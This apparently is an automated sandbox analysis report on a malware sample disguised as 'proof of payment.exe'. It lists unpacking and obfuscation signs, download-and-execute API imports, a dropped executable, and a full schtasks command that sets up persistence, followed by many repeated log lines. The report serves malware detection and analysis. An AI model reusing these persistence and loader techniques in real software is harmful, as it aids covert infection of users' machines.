Source: 0.2.proof of paymentt.exe.2c69c0c.2.raw.unpack, XG.cs	.Net Code: Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777298)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777243)),Type.GetTypeFromHandle(global::cO.Ri.k2anMS(16777254))})

.NET source code contains potential unpacker

Source: 0.2.proof of paymentt.exe.7a80000.9.raw.unpack, Uy7kHJNonmXTDU7Lsr.cs

.Net Code: I50Ltwc2At System.Reflection.Assembly.Load(byte[])

Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe

Code function: 12_2_0041CB50 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,

12_2_0041CB50

Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 0_2_02BCEE5E push cs; ret	0_2_02BCEE5F
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 0_2_02BDAC5C push ds; retf	0_2_02BDAC5F
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 7_2_10002806 push ecx; ret	7_2_10002819
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 9_2_0543AC5C push ds; retf	9_2_0543AC5F
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 9_2_073BB7D0 push 0000005Dh; ret	9_2_073BB7C2
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 9_2_073B8CD0 push eax; iretd	9_2_073B8CD1
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_00457106 push ecx; ret	12_2_00457119
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_0045B11A push esp; ret	12_2_0045B141
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_0045E54D push esi; ret	12_2_0045E556
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_00457A28 push eax; ret	12_2_00457A46
Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe	Code function: 12_2_00434E56 push ecx; ret	12_2_00434E69
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 16_2_0044693D push ecx; ret	16_2_0044694D
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 16_2_0044DB70 push eax; ret	16_2_0044DB84
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 16_2_0044DB70 push eax; ret	16_2_0044DBAC
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 16_2_00451D54 push eax; ret	16_2_00451D61
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 17_2_0044B090 push eax; ret	17_2_0044B0A4
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 17_2_0044B090 push eax; ret	17_2_0044B0CC
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 17_2_00451D34 push eax; ret	17_2_00451D41
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 17_2_00444E71 push ecx; ret	17_2_00444E81
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 19_2_00414060 push eax; ret	19_2_00414074
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 19_2_00414060 push eax; ret	19_2_0041409C
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 19_2_00414039 push ecx; ret	19_2_00414049
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 19_2_004164EB push 0000006Ah; retf	19_2_004165C4
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 19_2_00416553 push 0000006Ah; retf	19_2_004165C4
Source: C:\Users\user\Desktop\proof of paymentt.exe	Code function: 19_2_00416555 push 0000006Ah; retf	19_2_004165C4

Source: proof of paymentt.exe	Static PE information: section name: .text entropy: 7.974353343649891
Source: mQpdTSxCjbPop.exe.0.dr	Static PE information: section name: .text entropy: 7.974353343649891

Source: 0.2.proof of paymentt.exe.6da0000.7.raw.unpack, XG.cs	High entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
Source: 0.2.proof of paymentt.exe.2c58f94.0.raw.unpack, XG.cs	High entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
Source: 0.2.proof of paymentt.exe.2c69c0c.2.raw.unpack, XG.cs	High entropy of concatenated method names: 'S1d', 'RgtTUJcyZL', 'n1Q', 'M1r', 'Y1a', 'U1m', 'k2an4M', 'gt', 'kU', 'rK'
Source: 0.2.proof of paymentt.exe.7a80000.9.raw.unpack, qcPsqkMi3y4den5Oyy.cs	High entropy of concatenated method names: 'cTLtu93Lt', 'RWXCEQRkn', 'gnxYkeVkT', 'nB51puwO9', 'kRNk3fJUH', 'fBQ3E5Pms', 'SnKC2jBH144y1VjTcA', 'JfLhnJSkJFaevoh8sj', 'KqZwHCxrp', 'EVhriHJLY'
Source: 0.2.proof of paymentt.exe.7a80000.9.raw.unpack, SpbYAbHt8iLHtxx4fS.cs	High entropy of concatenated method names: 'pDMAhHpMal', 'm5tAPMgG94', 'K6FA9QcCL1', 'y1rAoyUU6T', 'dOEA6ODpDy', 'Q94AOR3dNl', 'pXYAmDTkdI', 'KR7AnbPjcv', 'BECAGVbUEr', 'reJAbmGSWo'
Source: 0.2.proof of paymentt.exe.7a80000.9.raw.unpack, I9hepiCTEjJEHmPIqM.cs	High entropy of concatenated method names: 'hAvInUsejT', 'maIIbQvAH6', 'vTCwBXdX5r', 'lRywHMwQPw', 'wYtIEvTIOM', 'MbPIT319kZ', 'Pp4IKN77SB', 'yj8IhoPYNI', 'JELIPRvLXr', 'ltsI9faV5q'
Source: 0.2.proof of paymentt.exe.7a80000.9.raw.unpack, eMt1eXX2rWx3oOKnj4u.cs	High entropy of concatenated method names: 'RVn74e8IGC', 'YZw7uQbyrG', 'jey7tnMiS7', 'WHl7CGEJ4y', 'sc57QxDFYU', 'Kcu7Yf3EXB', 'KnW712Ch5r', 'Yog7gO2yJY', 'Rb97kCcpc8', 'Usb730oH2j'
Source: 0.2.proof of paymentt.exe.7a80000.9.raw.unpack, Gvxd3tmk2Tw2D2crrR.cs	High entropy of concatenated method names: 'hnnidymOt8', 'mTeiAe8J5r', 'LT1icYYhIl', 'NfFiyBOekH', 'peYi8C0Mor', 'qlZc6X3rb5', 'uELcOXpsEp', 'HVMcmsST2q', 'mJScn1aUoO', 'fdPcGQd9tO'
Source: 0.2.proof of paymentt.exe.7a80000.9.raw.unpack, PPKomfYuG5NaNfHBoC.cs	High entropy of concatenated method names: 'LB67H311eK', 'U217lBCmHl', 'gTe7Ln3lU8', 'bfq7e0nIES', 'fFs7A87ik9', 'ynL7cWUcXm', 'KVd7iLc83a', 'ixLwma0Uvt', 'q63wnooBpM', 'Xw1wGOOZM8'
Source: 0.2.proof of paymentt.exe.7a80000.9.raw.unpack, fYHich47ZylKAtqmou.cs	High entropy of concatenated method names: 'Dispose', 'qvrHGl7LGX', 'BnOSF5DBOu', 'Aqa55N4ou2', 'LJaHbRDhsl', 'DJvHz008Gm', 'ProcessDialogKey', 'rrBSB2b28G', 'Ea8SHV53nM', 'BCGSSNtlEp'
Source: 0.2.proof of paymentt.exe.7a80000.9.raw.unpack, iey45ceLgDGiYqC2Rr.cs	High entropy of concatenated method names: 'JWpyeqhEK5', 'sR1yDc5NNe', 'tolyiaPB86', 'ELvib3tnw5', 'jMuiz8J1LO', 'aJgyB6OxuI', 'iaIyHKroOc', 'fauySPWajL', 'ksXylGODkM', 'fHJyLkv57p'
Source: 0.2.proof of paymentt.exe.7a80000.9.raw.unpack, rgwHvasinuixl4dKg7.cs	High entropy of concatenated method names: 'tthwMZowAa', 'RKRwFXlqem', 'NnRwWdc1tb', 'XF7w2ZMNk1', 'v5iwhX4fEC', 'lJQwqvKd0I', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.proof of paymentt.exe.7a80000.9.raw.unpack, w5mbb6xP21y2LOUUcn.cs	High entropy of concatenated method names: 'wnfweDy3cM', 'UhnwAqMxdJ', 'dS8wDsEb8A', 'kaAwcUjg7k', 'jAPwiSctG2', 'O3mwyMZ4Hg', 'qe6w8O2Bwt', 'uHowRJOy3k', 'zHZwsARhwZ', 'hfLwjsa8Bm'
Source: 0.2.proof of paymentt.exe.7a80000.9.raw.unpack, WTJTMbzUtcldoX9Fr5.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'cnL7v7oFlB', 'AJC70ONwdS', 'kXe7xWWiyG', 'vJ17IP5gCo', 'cHT7w8kxc2', 'qAk770kXvN', 'l6N7rJmuLg'
Source: 0.2.proof of paymentt.exe.7a80000.9.raw.unpack, MmcwaCfEgbRARrJpSJ.cs	High entropy of concatenated method names: 'CFJHyUD70d', 'yBQH8Pquc2', 'fR4HsEIfC5', 'JmbHjMRcvh', 'VuDH0oBBSe', 'L8jHx0nwZZ', 'r4CgSBiyYud1GYUj1i', 'YpAeJuD0QrBmEogyJT', 'FbMHHaufZT', 'CoqHl8SjqK'
Source: 0.2.proof of paymentt.exe.7a80000.9.raw.unpack, fTBna9KfXEIggkCI7I.cs	High entropy of concatenated method names: 'zA4DClT75C', 'wqfDYcSNqT', 'zKbDgOOF4g', 'q2PDkBBwma', 'OlPD0YxaAQ', 'HhNDxgdXGj', 'lhQDISYyYE', 'RUnDwpZZpo', 'JmaD73FM9b', 'EYyDr1kGha'
Source: 0.2.proof of paymentt.exe.7a80000.9.raw.unpack, pTiHaXOv3t0tqwJkYa.cs	High entropy of concatenated method names: 'zWrvgFuBN2', 'llAvkkA52J', 'oEHvMdcjUS', 'GdavF20AW7', 'IO0v2q28Mn', 'NNOvqpio0W', 'flMvUoHxS9', 'ClKvVvlrNX', 'OoYvfBdrdF', 'rb8vE5E6dp'
Source: 0.2.proof of paymentt.exe.7a80000.9.raw.unpack, JlxJOqXj4f0swi1N0UE.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'eV5rh3kl06', 'ztvrPIX9jT', 'TJAr9x0kn6', 'lf6rofmoMd', 'yBur6D2FuX', 'r9hrOSGOJG', 'ruxrmZa7Cy'
Source: 0.2.proof of paymentt.exe.7a80000.9.raw.unpack, JHJAmjlrah4ZaISbZy.cs	High entropy of concatenated method names: 'B9Fy40WnLW', 'YGNyugkGhH', 'vN3yt5wB3t', 'cFZyCKrDh6', 'WGLyQdTs6f', 'YC3yYO0ySC', 'rEfy1ZTYYN', 'fw1ygdl0Zo', 'JOwykj8tLC', 'om8y3y23Ho'
Source: 0.2.proof of paymentt.exe.7a80000.9.raw.unpack, Uy7kHJNonmXTDU7Lsr.cs	High entropy of concatenated method names: 'WR7ldW17Bu', 'wAllevXbVi', 'wtflAPHKoS', 'toZlDAZq0u', 'fpslcE7jPd', 'lGwli4wwxQ', 'XXbly6P23o', 'hB9l89ce6c', 'P6alRC5mpZ', 'DiplsZvL0P'
Source: 0.2.proof of paymentt.exe.7a80000.9.raw.unpack, r2SWyX8lgK1VOQRj9e.cs	High entropy of concatenated method names: 'Dhr0fFi4Lm', 'Lmy0TVclbj', 'wkU0hRdMPQ', 'Yx60PHR79n', 'Ttw0FB9Lbm', 'cc60WcnSCa', 'Nti0288riK', 'Uc90qCWgcg', 'UBP0ZPXrKX', 'xKE0UNoghk'
Source: 0.2.proof of paymentt.exe.7a80000.9.raw.unpack, vUJoE1Fd4ZVObjbG68.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'wqkSG82veT', 'HmLSbtMiq9', 'loqSzNOWsR', 'Jf2lBb8b39', 'E4MlHAbFsv', 'IJhlSeCHga', 'asHllujjdj', 'bLbYEAaR4iOF6KO8QMI'
Source: 0.2.proof of paymentt.exe.7a80000.9.raw.unpack, eZEvVci1QgbRrpMG4O.cs	High entropy of concatenated method names: 'nQNcQirUbP', 'I4bc1xH6S6', 'GPlDWQ5IsO', 'MKLD2DbZWy', 'G59DqiOiI7', 'LmqDZ0jiXk', 'NMRDUtxQBQ', 'mogDV8BMJI', 'gHeDNRLcNU', 'CdlDf9cPR2'
Source: 0.2.proof of paymentt.exe.7a80000.9.raw.unpack, i4poINBUiyLfAkGA2E.cs	High entropy of concatenated method names: 'ToString', 'P9QxEktirO', 'm9wxFLr82N', 'uNjxW60g7W', 'Wahx27Vibm', 'GVDxq8lGe6', 'HeExZMFLVC', 'wM2xUDxkyp', 'xp3xVYqy9W', 'I8cxNZIbwA'

Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe

Code function: 12_2_00406EB0 ShellExecuteW,URLDownloadToFileW,

12_2_00406EB0

Source: C:\Users\user\Desktop\proof of paymentt.exe

File created: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\proof of paymentt.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\mQpdTSxCjbPop" /XML "C:\Users\user\AppData\Local\Temp\tmp73D0.tmp"

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk	Jump to behavior

Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe

Code function: 12_2_0041AA4A OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,

12_2_0041AA4A

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Source: C:\Users\user\AppData\Roaming\mQpdTSxCjbPop.exe

12_2_0041CB50

Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\proof of paymentt.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
